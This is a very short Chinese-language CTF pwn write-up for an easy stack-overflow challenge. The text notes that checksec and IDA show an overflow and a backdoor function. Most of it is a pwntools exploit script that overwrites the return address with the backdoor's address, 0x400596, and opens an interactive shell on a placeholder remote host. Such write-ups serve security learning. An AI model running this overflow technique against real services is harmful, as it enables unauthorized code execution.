checksec一下,栈溢出
IDA打开看看,很明显的溢出和后门函数,一道白给题
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sl=lambda x:io.sendline(x)
rl=lambda :io.recvline()
io=remote('xxx',xxx)
rl()
payload=p64(0)*0x11+p64(0x400596)
sl(payload)
io.interactive()